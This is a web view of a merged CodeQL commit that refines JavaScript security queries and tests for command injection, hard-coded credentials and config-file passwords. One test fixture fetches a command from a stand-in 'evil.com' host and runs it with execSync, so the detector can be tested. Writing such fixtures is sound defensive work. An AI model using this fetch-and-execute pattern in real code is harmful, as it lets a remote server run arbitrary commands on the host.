hohn/codeql
1
0
Fork 0
mirror of https://github.com/github/codeql.git synced 2026-05-02 20:25:13 +02:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into node-js-classification

Browse Source
This commit is contained in:
Esben Sparre Andreasen
2019-09-19 09:42:26 +02:00
committed by GitHub
parent f8eff06aa1 9b805c01cc
commit b631bfc8eb
107 changed files with 1462 additions and 3757 deletions
Download Patch File Download Diff File Expand all files Collapse all files

17
javascript/ql/src/Security/CWE-020/IncorrectSuffixCheck.ql
View File

@@ -30,17 +30,26 @@ class IndexOfCall extends DataFlow::MethodCallNode {
result = getArgument(0)
}
/**
* Holds if `recv` is the local source of the receiver of this call, and `m`
* is the name of the invoked method.
*/
private predicate receiverAndMethodName(DataFlow::Node recv, string m) {
this.getReceiver().getALocalSource() = recv and
this.getMethodName() = m
}
/**
* Gets an `indexOf` call with the same receiver, argument, and method name, including this call itself.
*/
IndexOfCall getAnEquivalentIndexOfCall() {
result.getReceiver().getALocalSource() = this.getReceiver().getALocalSource() and
(
exists(DataFlow::Node recv, string m |
this.receiverAndMethodName(recv, m) and result.receiverAndMethodName(recv, m)
|
result.getArgument(0).getALocalSource() = this.getArgument(0).getALocalSource()
or
result.getArgument(0).getStringValue() = this.getArgument(0).getStringValue()
) and
result.getMethodName() = this.getMethodName()
)
}
/**

8
javascript/ql/src/Security/CWE-078/CommandInjection.ql
View File

@@ -16,11 +16,11 @@ import javascript
import semmle.javascript.security.dataflow.CommandInjection::CommandInjection
import DataFlow::PathGraph
from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink, DataFlow::Node highlight
from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink, DataFlow::Node highlight, Source sourceNode
where
cfg.hasFlowPath(source, sink) and
if cfg.isSinkWithHighlight(sink.getNode(), _)
then cfg.isSinkWithHighlight(sink.getNode(), highlight)
else highlight = sink.getNode()
select highlight, source, sink, "This command depends on $@.", source.getNode(),
"a user-provided value"
else highlight = sink.getNode() and
sourceNode = source.getNode()
select highlight, source, sink, "This command depends on $@.", sourceNode, sourceNode.getSourceType()

4
javascript/ql/src/Security/CWE-313/PasswordInConfigurationFile.ql
View File

@@ -13,6 +13,7 @@
import javascript
import semmle.javascript.RestrictedLocations
import semmle.javascript.security.SensitiveActions
/**
* Holds if some JSON or YAML file contains a property with name `key`
@@ -56,7 +57,8 @@ where
key.toLowerCase() = "password" and
pwd = val and
// exclude interpolations of environment variables
not val.regexpMatch("\\$.*|%.*%")
not val.regexpMatch("\\$.*|%.*%") and
not PasswordHeuristics::isDummyPassword(val)
or
key.toLowerCase() != "readme" and
// look for `password=...`, but exclude `password=;`, `password="$(...)"`,

10
javascript/ql/src/Security/CWE-798/HardcodedCredentials.ql
View File

@@ -22,8 +22,14 @@ where
// use source value in message if it's available
if source.getNode().asExpr() instanceof ConstantString
then
value = "The hard-coded value \"" + source.getNode().getStringValue() +
"\""
exists(string val | val = source.getNode().getStringValue() |
// exclude dummy passwords
not (
sink.getNode().(Sink).(DefaultCredentialsSink).getKind() = "password" and
PasswordHeuristics::isDummyPassword(val)
) and
value = "The hard-coded value \"" + val + "\""
)
else value = "This hard-coded value"
select source.getNode(), source, sink, value + " is used as $@.", sink.getNode(),
sink.getNode().(Sink).getKind()

4
javascript/ql/src/Security/CWE-912/HttpToFileAccess.ql
View File

@@ -1,6 +1,6 @@
/**
* @name User-controlled data written to file
* @description Writing user-controlled data directly to the file system allows arbitrary file upload and might indicate a backdoor.
* @name Network data written to file
* @description Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.
* @kind path-problem
* @problem.severity warning
* @precision medium

2
javascript/ql/src/semmle/javascript/frameworks/ClientRequests.qll
View File

@@ -452,6 +452,8 @@ module ClientRequest {
or
prop = "responseText" and responseType = "text"
or
prop = "responseUrl" and responseType = "text"
or
prop = "statusText" and responseType = "text"
or
prop = "responseXML" and responseType = "document"

33
javascript/ql/src/semmle/javascript/frameworks/NodeJSLib.qll
View File

@@ -735,34 +735,17 @@ module NodeJSLib {
result = this.(DataFlow::SourceNode).getAMethodCall(name).getArgument(0)
)
}
}
/**
* A data flow node that is the parameter of a result callback for an HTTP or HTTPS request made by a Node.js process, for example `res` in `https.request(url, (res) => {})`.
*/
private class ClientRequestCallbackParam extends DataFlow::ParameterNode, RemoteFlowSource {
ClientRequestCallbackParam() {
exists(NodeJSClientRequest req |
this = req.(DataFlow::MethodCallNode).getCallback(1).getParameter(0)
override DataFlow::Node getAResponseDataNode(string responseType, boolean promise) {
promise = false and
exists(DataFlow::ParameterNode res, DataFlow::CallNode onData |
res = getCallback(1).getParameter(0) and
onData = res.getAMethodCall("on") and
onData.getArgument(0).mayHaveStringValue("data") and
result = onData.getCallback(1).getParameter(0) and
responseType = "arraybuffer"
)
}
override string getSourceType() { result = "NodeJSClientRequest callback parameter" }
}
/**
* A data flow node that is the parameter of a data callback for an HTTP or HTTPS request made by a Node.js process, for example `body` in `http.request(url, (res) => {res.on('data', (body) => {})})`.
*/
private class ClientRequestCallbackData extends RemoteFlowSource {
ClientRequestCallbackData() {
exists(ClientRequestCallbackParam rcp, DataFlow::MethodCallNode mcn |
rcp.getAMethodCall("on") = mcn and
mcn.getArgument(0).mayHaveStringValue("data") and
this = mcn.getCallback(1).getParameter(0)
)
}
override string getSourceType() { result = "http.request data parameter" }
}
/**

21
javascript/ql/src/semmle/javascript/heuristics/AdditionalSources.qll
View File

@@ -31,4 +31,25 @@ private class JSONStringifyAsCommandInjectionSource extends HeuristicSource,
JSONStringifyAsCommandInjectionSource() {
this = DataFlow::globalVarRef("JSON").getAMemberCall("stringify")
}
override string getSourceType() { result = "a string from JSON.stringify" }
}
/**
* A response from a remote server.
*/
class RemoteServerResponse extends HeuristicSource, RemoteFlowSource {
RemoteServerResponse() {
exists(ClientRequest r |
this = r.getAResponseDataNode() and
not exists(string url, string protocolPattern |
// exclude URLs to the current host
r.getUrl().mayHaveStringValue(url) and
protocolPattern = "(?[a-z+]{3,10}:)" and
not url.regexpMatch(protocolPattern + "?//.*")
)
)
}
override string getSourceType() { result = "a response from a remote server" }
}

18
javascript/ql/src/semmle/javascript/security/SensitiveActions.qll
View File

@@ -245,3 +245,21 @@ class CleartextPasswordExpr extends SensitiveExpr {
override SensitiveExpr::Classification getClassification() { none() }
}
/**
* Provides heuristics for classifying passwords.
*/
module PasswordHeuristics {
/**
* Holds if `password` looks like a deliberately weak password that the user should change.
*/
bindingset[password]
predicate isDummyPassword(string password) {
password.length() < 4
or
exists(string normalized | normalized = password.toLowerCase() |
count(normalized.charAt(_)) = 1 or
normalized.regexpMatch(".*(pass|test|sample|example|secret|root|admin|user|change|auth).*")
)
}
}

16
javascript/ql/src/semmle/javascript/security/dataflow/CommandInjectionCustomizations.qll
View File

@@ -11,7 +11,10 @@ module CommandInjection {
/**
* A data flow source for command-injection vulnerabilities.
*/
abstract class Source extends DataFlow::Node { }
abstract class Source extends DataFlow::Node {
/** Gets a string that describes the type of this remote flow source. */
abstract string getSourceType();
}
/**
* A data flow sink for command-injection vulnerabilities.
@@ -26,6 +29,17 @@ module CommandInjection {
/** A source of remote user input, considered as a flow source for command injection. */
class RemoteFlowSourceAsSource extends Source {
RemoteFlowSourceAsSource() { this instanceof RemoteFlowSource }
override string getSourceType() { result = "a user-provided value" }
}
/**
* A response from a server, considered as a flow source for command injection.
*/
class ServerResponse extends Source {
ServerResponse() { this = any(ClientRequest r).getAResponseDataNode() }
override string getSourceType() { result = "a server-provided value" }
}
/**

14
javascript/ql/src/semmle/javascript/security/dataflow/HttpToFileAccessCustomizations.qll
View File

@@ -24,10 +24,22 @@ module HttpToFileAccess {
abstract class Sanitizer extends DataFlow::Node { }
/** A source of remote user input, considered as a flow source for writing user-controlled data to files. */
class RemoteFlowSourceAsSource extends Source {
deprecated class RemoteFlowSourceAsSource extends DataFlow::Node {
RemoteFlowSourceAsSource() { this instanceof RemoteFlowSource }
}
/**
* An access to a user-controlled HTTP request input, considered as a flow source for writing user-controlled data to files
*/
private class RequestInputAccessAsSource extends Source {
RequestInputAccessAsSource() { this instanceof HTTP::RequestInputAccess }
}
/** A response from a server, considered as a flow source for writing user-controlled data to files. */
private class ServerResponseAsSource extends Source {
ServerResponseAsSource() { this = any(ClientRequest r).getAResponseDataNode() }
}
/** A sink that represents file access method (write, append) argument */
class FileAccessAsSink extends Sink {
FileAccessAsSink() { exists(FileSystemWriteAccess src | this = src.getADataNode()) }

9
javascript/ql/test/library-tests/SensitiveActions/DummyPasswords.expected Normal file
View File

@@ -0,0 +1,9 @@
| | true |
| XXXXXXXX | true |
| abcdefgh | false |
| admin | true |
| change_me | true |
| example_password | true |
| insert-auth-from-gui | true |
| root | true |
| sOKY6ccizpmvF*32so%Q | false |

20
javascript/ql/test/library-tests/SensitiveActions/DummyPasswords.ql Normal file
View File

@@ -0,0 +1,20 @@
import javascript
import semmle.javascript.security.SensitiveActions
string getASamplePassword() {
result = "abcdefgh" or
result = "sOKY6ccizpmvF*32so%Q" or
result = "XXXXXXXX" or
result = "example_password" or
result = "change_me" or
result = "" or
result = "insert-auth-from-gui" or
result = "admin" or
result = "root"
}
from string password, boolean isDummy
where
password = getASamplePassword() and
if PasswordHeuristics::isDummyPassword(password) then isDummy = true else isDummy = false
select password, isDummy

2
javascript/ql/test/library-tests/frameworks/NodeJSLib/tests.expected
View File

@@ -137,8 +137,6 @@ test_RemoteFlowSources
| src/http.js:6:26:6:32 | req.url |
| src/http.js:8:3:8:20 | req.headers.cookie |
| src/http.js:9:3:9:17 | req.headers.foo |
| src/http.js:21:33:21:40 | response |
| src/http.js:23:28:23:32 | chunk |
| src/http.js:29:26:29:33 | response |
| src/http.js:30:28:30:32 | chunk |
| src/http.js:40:23:40:30 | authInfo |

4
javascript/ql/test/query-tests/Security/CWE-078/CommandInjection.expected
View File

@@ -67,6 +67,8 @@ nodes
| other.js:17:27:17:29 | cmd |
| other.js:18:22:18:24 | cmd |
| other.js:19:36:19:38 | cmd |
| third-party-command-injection.js:5:20:5:26 | command |
| third-party-command-injection.js:6:21:6:27 | command |
edges
| child_process-test.js:6:9:6:49 | cmd | child_process-test.js:17:13:17:15 | cmd |
| child_process-test.js:6:9:6:49 | cmd | child_process-test.js:18:17:18:19 | cmd |
@@ -134,6 +136,7 @@ edges
| other.js:5:15:5:44 | url.par ... ).query | other.js:5:15:5:49 | url.par ... ry.path |
| other.js:5:15:5:49 | url.par ... ry.path | other.js:5:9:5:49 | cmd |
| other.js:5:25:5:31 | req.url | other.js:5:15:5:38 | url.par ... , true) |
| third-party-command-injection.js:5:20:5:26 | command | third-party-command-injection.js:6:21:6:27 | command |
#select
| child_process-test.js:17:13:17:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:17:13:17:15 | cmd | This command depends on $@. | child_process-test.js:6:25:6:31 | req.url | a user-provided value |
| child_process-test.js:18:17:18:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:18:17:18:19 | cmd | This command depends on $@. | child_process-test.js:6:25:6:31 | req.url | a user-provided value |
@@ -160,3 +163,4 @@ edges
| other.js:17:27:17:29 | cmd | other.js:5:25:5:31 | req.url | other.js:17:27:17:29 | cmd | This command depends on $@. | other.js:5:25:5:31 | req.url | a user-provided value |
| other.js:18:22:18:24 | cmd | other.js:5:25:5:31 | req.url | other.js:18:22:18:24 | cmd | This command depends on $@. | other.js:5:25:5:31 | req.url | a user-provided value |
| other.js:19:36:19:38 | cmd | other.js:5:25:5:31 | req.url | other.js:19:36:19:38 | cmd | This command depends on $@. | other.js:5:25:5:31 | req.url | a user-provided value |
| third-party-command-injection.js:6:21:6:27 | command | third-party-command-injection.js:5:20:5:26 | command | third-party-command-injection.js:6:21:6:27 | command | This command depends on $@. | third-party-command-injection.js:5:20:5:26 | command | a server-provided value |

8
javascript/ql/test/query-tests/Security/CWE-078/third-party-command-injection.js Normal file
View File

@@ -0,0 +1,8 @@
let https = require("https"),
cp = require("child_process");
https.get("https://evil.com/getCommand", res =>
res.on("data", command => {
cp.execSync(command);
})
);

4
javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected
View File

@@ -27,8 +27,6 @@ nodes
| angularjs.js:50:22:50:36 | location.search |
| angularjs.js:53:32:53:39 | location |
| angularjs.js:53:32:53:46 | location.search |
| eslint-escope-build.js:20:22:20:22 | c |
| eslint-escope-build.js:21:16:21:16 | c |
| express.js:7:24:7:69 | "return ... + "];" |
| express.js:7:44:7:62 | req.param("wobble") |
| express.js:9:34:9:79 | "return ... + "];" |
@@ -73,7 +71,6 @@ edges
| angularjs.js:47:16:47:23 | location | angularjs.js:47:16:47:30 | location.search |
| angularjs.js:50:22:50:29 | location | angularjs.js:50:22:50:36 | location.search |
| angularjs.js:53:32:53:39 | location | angularjs.js:53:32:53:46 | location.search |
| eslint-escope-build.js:20:22:20:22 | c | eslint-escope-build.js:21:16:21:16 | c |
| express.js:7:24:7:62 | "return ... obble") | express.js:7:24:7:69 | "return ... + "];" |
| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:62 | "return ... obble") |
| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" |
@@ -113,7 +110,6 @@ edges
| angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:23 | location | angularjs.js:47:16:47:30 | location.search | $@ flows to here and is interpreted as code. | angularjs.js:47:16:47:23 | location | User-provided value |
| angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:29 | location | angularjs.js:50:22:50:36 | location.search | $@ flows to here and is interpreted as code. | angularjs.js:50:22:50:29 | location | User-provided value |
| angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:39 | location | angularjs.js:53:32:53:46 | location.search | $@ flows to here and is interpreted as code. | angularjs.js:53:32:53:39 | location | User-provided value |
| eslint-escope-build.js:21:16:21:16 | c | eslint-escope-build.js:20:22:20:22 | c | eslint-escope-build.js:21:16:21:16 | c | $@ flows to here and is interpreted as code. | eslint-escope-build.js:20:22:20:22 | c | User-provided value |
| express.js:7:24:7:69 | "return ... + "];" | express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | $@ flows to here and is interpreted as code. | express.js:7:44:7:62 | req.param("wobble") | User-provided value |
| express.js:9:34:9:79 | "return ... + "];" | express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | $@ flows to here and is interpreted as code. | express.js:9:54:9:72 | req.param("wobble") | User-provided value |
| express.js:12:8:12:53 | "return ... + "];" | express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | $@ flows to here and is interpreted as code. | express.js:12:28:12:46 | req.param("wobble") | User-provided value |

102
javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected Normal file
View File

@@ -0,0 +1,102 @@
nodes
| angularjs.js:10:22:10:29 | location |
| angularjs.js:10:22:10:36 | location.search |
| angularjs.js:13:23:13:30 | location |
| angularjs.js:13:23:13:37 | location.search |
| angularjs.js:16:28:16:35 | location |
| angularjs.js:16:28:16:42 | location.search |
| angularjs.js:19:22:19:29 | location |
| angularjs.js:19:22:19:36 | location.search |
| angularjs.js:22:27:22:34 | location |
| angularjs.js:22:27:22:41 | location.search |
| angularjs.js:25:23:25:30 | location |
| angularjs.js:25:23:25:37 | location.search |
| angularjs.js:28:33:28:40 | location |
| angularjs.js:28:33:28:47 | location.search |
| angularjs.js:31:28:31:35 | location |
| angularjs.js:31:28:31:42 | location.search |
| angularjs.js:34:18:34:25 | location |
| angularjs.js:34:18:34:32 | location.search |
| angularjs.js:40:18:40:25 | location |
| angularjs.js:40:18:40:32 | location.search |
| angularjs.js:44:17:44:24 | location |
| angularjs.js:44:17:44:31 | location.search |
| angularjs.js:47:16:47:23 | location |
| angularjs.js:47:16:47:30 | location.search |
| angularjs.js:50:22:50:29 | location |
| angularjs.js:50:22:50:36 | location.search |
| angularjs.js:53:32:53:39 | location |
| angularjs.js:53:32:53:46 | location.search |
| eslint-escope-build.js:20:22:20:22 | c |
| eslint-escope-build.js:21:16:21:16 | c |
| express.js:7:24:7:69 | "return ... + "];" |
| express.js:7:44:7:62 | req.param("wobble") |
| express.js:9:34:9:79 | "return ... + "];" |
| express.js:9:54:9:72 | req.param("wobble") |
| express.js:12:8:12:53 | "return ... + "];" |
| express.js:12:28:12:46 | req.param("wobble") |
| react-native.js:7:7:7:33 | tainted |
| react-native.js:7:17:7:33 | req.param("code") |
| react-native.js:8:32:8:38 | tainted |
| react-native.js:10:23:10:29 | tainted |
| tst.js:2:6:2:22 | document.location |
| tst.js:2:6:2:27 | documen ... on.href |
| tst.js:2:6:2:83 | documen ... t=")+8) |
| tst.js:5:12:5:28 | document.location |
| tst.js:5:12:5:33 | documen ... on.hash |
| tst.js:14:10:14:26 | document.location |
| tst.js:14:10:14:33 | documen ... .search |
| tst.js:14:10:14:74 | documen ... , "$1") |
| tst.js:17:21:17:37 | document.location |
| tst.js:17:21:17:42 | documen ... on.hash |
| tst.js:20:30:20:46 | document.location |
| tst.js:20:30:20:51 | documen ... on.hash |
| tst.js:23:6:23:46 | atob(do ... ing(1)) |
| tst.js:23:11:23:27 | document.location |
| tst.js:23:11:23:32 | documen ... on.hash |
| tst.js:23:11:23:45 | documen ... ring(1) |
| tst.js:26:26:26:33 | location |
| tst.js:26:26:26:40 | location.search |
| tst.js:26:26:26:53 | locatio ... ring(1) |
edges
| angularjs.js:10:22:10:29 | location | angularjs.js:10:22:10:36 | location.search |
| angularjs.js:13:23:13:30 | location | angularjs.js:13:23:13:37 | location.search |
| angularjs.js:16:28:16:35 | location | angularjs.js:16:28:16:42 | location.search |
| angularjs.js:19:22:19:29 | location | angularjs.js:19:22:19:36 | location.search |
| angularjs.js:22:27:22:34 | location | angularjs.js:22:27:22:41 | location.search |
| angularjs.js:25:23:25:30 | location | angularjs.js:25:23:25:37 | location.search |
| angularjs.js:28:33:28:40 | location | angularjs.js:28:33:28:47 | location.search |
| angularjs.js:31:28:31:35 | location | angularjs.js:31:28:31:42 | location.search |
| angularjs.js:34:18:34:25 | location | angularjs.js:34:18:34:32 | location.search |
| angularjs.js:40:18:40:25 | location | angularjs.js:40:18:40:32 | location.search |
| angularjs.js:44:17:44:24 | location | angularjs.js:44:17:44:31 | location.search |
| angularjs.js:47:16:47:23 | location | angularjs.js:47:16:47:30 | location.search |
| angularjs.js:50:22:50:29 | location | angularjs.js:50:22:50:36 | location.search |
| angularjs.js:53:32:53:39 | location | angularjs.js:53:32:53:46 | location.search |
| eslint-escope-build.js:20:22:20:22 | c | eslint-escope-build.js:21:16:21:16 | c |
| express.js:7:24:7:62 | "return ... obble") | express.js:7:24:7:69 | "return ... + "];" |
| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:62 | "return ... obble") |
| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" |
| express.js:9:34:9:72 | "return ... obble") | express.js:9:34:9:79 | "return ... + "];" |
| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:72 | "return ... obble") |
| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" |
| express.js:12:8:12:46 | "return ... obble") | express.js:12:8:12:53 | "return ... + "];" |
| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:46 | "return ... obble") |
| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" |
| react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted |
| react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted |
| react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted |
| tst.js:2:6:2:22 | document.location | tst.js:2:6:2:27 | documen ... on.href |
| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) |
| tst.js:5:12:5:28 | document.location | tst.js:5:12:5:33 | documen ... on.hash |
| tst.js:14:10:14:26 | document.location | tst.js:14:10:14:33 | documen ... .search |
| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") |
| tst.js:17:21:17:37 | document.location | tst.js:17:21:17:42 | documen ... on.hash |
| tst.js:20:30:20:46 | document.location | tst.js:20:30:20:51 | documen ... on.hash |
| tst.js:23:11:23:27 | document.location | tst.js:23:11:23:32 | documen ... on.hash |
| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) |
| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) |
| tst.js:26:26:26:33 | location | tst.js:26:26:26:40 | location.search |
| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) |
#select
| eslint-escope-build.js:21:16:21:16 | c | eslint-escope-build.js:20:22:20:22 | c | eslint-escope-build.js:21:16:21:16 | c | $@ flows to here and is interpreted as code. | eslint-escope-build.js:20:22:20:22 | c | User-provided value |

9
javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.ql Normal file
View File

@@ -0,0 +1,9 @@
import javascript
import semmle.javascript.heuristics.AdditionalSources
import semmle.javascript.security.dataflow.CodeInjection::CodeInjection
import DataFlow::PathGraph
from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink) and source.getNode() instanceof HeuristicSource
select sink.getNode(), source, sink, "$@ flows to here and is interpreted as code.",
source.getNode(), "User-provided value"

2
javascript/ql/test/query-tests/Security/CWE-313/PasswordInConfigurationFile.expected
View File

@@ -1,3 +1,3 @@
| mysql-config.json:4:16:4:23 | "secret" | Hard-coded password 'secret' in configuration file. |
| mysql-config.json:4:16:4:25 | "abcdefgh" | Hard-coded password 'abcdefgh' in configuration file. |
| tst4.json:2:10:2:38 | "script ... ecret'" | Hard-coded password ''secret'' in configuration file. |
| tst7.yml:2:9:2:6 | \| | Hard-coded password 'abc' in configuration file. |

4
javascript/ql/test/query-tests/Security/CWE-313/mysql-config.json
View File

@@ -1,6 +1,6 @@
{
"host" : "localhost",
"user" : "me",
"password" : "secret",
"password" : "abcdefgh",
"database" : "my_db"
}
}

1
javascript/ql/test/query-tests/Security/CWE-313/tst.yml
View File

@@ -4,3 +4,4 @@ steps:
OTHER_PASSWORD=`get password` yarn install
username: <%= ENV['USERNAME'] %>
password: <%= ENV['PASSWORD'] %>
password: change_me

119
javascript/ql/test/query-tests/Security/CWE-798/HardcodedCredentials.expected
View File

@@ -1,107 +1,112 @@
nodes
| HardcodedCredentials.js:5:15:5:22 | 'dbuser' |
| HardcodedCredentials.js:8:19:8:34 | 'secretpassword' |
| HardcodedCredentials.js:15:36:15:50 | "user:password" |
| HardcodedCredentials.js:16:37:16:51 | "user:password" |
| HardcodedCredentials.js:18:16:18:30 | "user:password" |
| HardcodedCredentials.js:8:19:8:28 | 'abcdefgh' |
| HardcodedCredentials.js:15:36:15:50 | "user:abcdefgh" |
| HardcodedCredentials.js:16:37:16:51 | "user:abcdefgh" |
| HardcodedCredentials.js:18:16:18:30 | "user:abcdefgh" |
| HardcodedCredentials.js:20:36:20:51 | getCredentials() |
| HardcodedCredentials.js:27:25:27:31 | 'admin' |
| HardcodedCredentials.js:27:34:27:46 | 'supersecret' |
| HardcodedCredentials.js:27:34:27:43 | 'abcdefgh' |
| HardcodedCredentials.js:29:11:29:30 | 'unknown-admin-name' |
| HardcodedCredentials.js:29:35:29:47 | 'supersecret' |
| HardcodedCredentials.js:29:35:29:44 | 'abcdefgh' |
| HardcodedCredentials.js:35:15:35:24 | 'username' |
| HardcodedCredentials.js:35:27:35:36 | 'password' |
| HardcodedCredentials.js:35:27:35:36 | 'abcdefgh' |
| HardcodedCredentials.js:41:38:41:47 | 'username' |
| HardcodedCredentials.js:41:67:41:76 | 'password' |
| HardcodedCredentials.js:41:67:41:76 | 'abcdefgh' |
| HardcodedCredentials.js:42:35:42:44 | 'username' |
| HardcodedCredentials.js:42:64:42:73 | 'password' |
| HardcodedCredentials.js:42:64:42:73 | 'abcdefgh' |
| HardcodedCredentials.js:44:34:44:43 | 'username' |
| HardcodedCredentials.js:44:63:44:72 | 'password' |
| HardcodedCredentials.js:46:25:46:34 | 'password' |
| HardcodedCredentials.js:44:63:44:72 | 'abcdefgh' |
| HardcodedCredentials.js:46:25:46:34 | 'abcdefgh' |
| HardcodedCredentials.js:53:27:53:36 | 'username' |
| HardcodedCredentials.js:53:39:53:48 | 'password' |
| HardcodedCredentials.js:53:39:53:48 | 'abcdefgh' |
| HardcodedCredentials.js:56:21:56:30 | 'username' |
| HardcodedCredentials.js:57:21:57:30 | 'password' |
| HardcodedCredentials.js:57:21:57:30 | 'abcdefgh' |
| HardcodedCredentials.js:61:42:61:54 | 'bearerToken' |
| HardcodedCredentials.js:65:23:65:35 | 'bearerToken' |
| HardcodedCredentials.js:69:28:69:37 | 'username' |
| HardcodedCredentials.js:69:40:69:49 | 'password' |
| HardcodedCredentials.js:69:40:69:49 | 'abcdefgh' |
| HardcodedCredentials.js:70:28:70:37 | 'username' |
| HardcodedCredentials.js:70:40:70:49 | 'password' |
| HardcodedCredentials.js:70:40:70:49 | 'abcdefgh' |
| HardcodedCredentials.js:72:23:72:32 | 'username' |
| HardcodedCredentials.js:72:35:72:44 | 'password' |
| HardcodedCredentials.js:72:35:72:44 | 'abcdefgh' |
| HardcodedCredentials.js:75:21:75:30 | 'username' |
| HardcodedCredentials.js:76:21:76:30 | 'password' |
| HardcodedCredentials.js:76:21:76:30 | 'abcdefgh' |
| HardcodedCredentials.js:84:38:84:47 | 'username' |
| HardcodedCredentials.js:84:50:84:59 | 'password' |
| HardcodedCredentials.js:84:50:84:59 | 'abcdefgh' |
| HardcodedCredentials.js:86:44:86:53 | 'username' |
| HardcodedCredentials.js:86:56:86:65 | 'password' |
| HardcodedCredentials.js:86:56:86:65 | 'abcdefgh' |
| HardcodedCredentials.js:91:25:91:31 | 'TOKEN' |
| HardcodedCredentials.js:98:18:98:21 | 'x1' |
| HardcodedCredentials.js:99:16:99:19 | 'x2' |
| HardcodedCredentials.js:100:25:100:28 | 'x3' |
| HardcodedCredentials.js:101:19:101:22 | 'x4' |
| HardcodedCredentials.js:102:14:102:17 | 'y1' |
| HardcodedCredentials.js:103:17:103:20 | 'y2' |
| HardcodedCredentials.js:104:27:104:30 | 'y3' |
| HardcodedCredentials.js:105:19:105:22 | 'y4' |
| HardcodedCredentials.js:106:16:106:19 | 'z1' |
| HardcodedCredentials.js:102:14:102:23 | 'abcdefgh' |
| HardcodedCredentials.js:103:17:103:26 | 'abcdefgh' |
| HardcodedCredentials.js:104:27:104:36 | 'abcdefgh' |
| HardcodedCredentials.js:105:19:105:28 | 'abcdefgh' |
| HardcodedCredentials.js:106:16:106:25 | 'abcdefgh' |
| HardcodedCredentials.js:112:19:112:22 | 'x5' |
| HardcodedCredentials.js:113:19:113:22 | 'y5' |
| HardcodedCredentials.js:130:44:130:58 | 'crypto secret' |
| HardcodedCredentials.js:131:52:131:73 | 'crypto ... secret' |
| HardcodedCredentials.js:135:41:135:63 | "cookie ... secret" |
| HardcodedCredentials.js:113:19:113:28 | 'abcdefgh' |
| HardcodedCredentials.js:130:44:130:53 | 'abcdefgh' |
| HardcodedCredentials.js:131:52:131:61 | 'abcdefgh' |
| HardcodedCredentials.js:135:41:135:50 | "abcdefgh" |
| HardcodedCredentials.js:160:38:160:48 | "change_me" |
| HardcodedCredentials.js:161:41:161:51 | 'change_me' |
| HardcodedCredentials.js:164:35:164:45 | 'change_me' |
edges
| HardcodedCredentials.js:18:16:18:30 | "user:password" | HardcodedCredentials.js:20:36:20:51 | getCredentials() |
| HardcodedCredentials.js:18:16:18:30 | "user:abcdefgh" | HardcodedCredentials.js:20:36:20:51 | getCredentials() |
#select
| HardcodedCredentials.js:5:15:5:22 | 'dbuser' | HardcodedCredentials.js:5:15:5:22 | 'dbuser' | HardcodedCredentials.js:5:15:5:22 | 'dbuser' | The hard-coded value "dbuser" is used as $@. | HardcodedCredentials.js:5:15:5:22 | 'dbuser' | user name |
| HardcodedCredentials.js:8:19:8:34 | 'secretpassword' | HardcodedCredentials.js:8:19:8:34 | 'secretpassword' | HardcodedCredentials.js:8:19:8:34 | 'secretpassword' | The hard-coded value "secretpassword" is used as $@. | HardcodedCredentials.js:8:19:8:34 | 'secretpassword' | password |
| HardcodedCredentials.js:15:36:15:50 | "user:password" | HardcodedCredentials.js:15:36:15:50 | "user:password" | HardcodedCredentials.js:15:36:15:50 | "user:password" | The hard-coded value "user:password" is used as $@. | HardcodedCredentials.js:15:36:15:50 | "user:password" | credentials |
| HardcodedCredentials.js:16:37:16:51 | "user:password" | HardcodedCredentials.js:16:37:16:51 | "user:password" | HardcodedCredentials.js:16:37:16:51 | "user:password" | The hard-coded value "user:password" is used as $@. | HardcodedCredentials.js:16:37:16:51 | "user:password" | credentials |
| HardcodedCredentials.js:18:16:18:30 | "user:password" | HardcodedCredentials.js:18:16:18:30 | "user:password" | HardcodedCredentials.js:20:36:20:51 | getCredentials() | The hard-coded value "user:password" is used as $@. | HardcodedCredentials.js:20:36:20:51 | getCredentials() | credentials |
| HardcodedCredentials.js:8:19:8:28 | 'abcdefgh' | HardcodedCredentials.js:8:19:8:28 | 'abcdefgh' | HardcodedCredentials.js:8:19:8:28 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:8:19:8:28 | 'abcdefgh' | password |
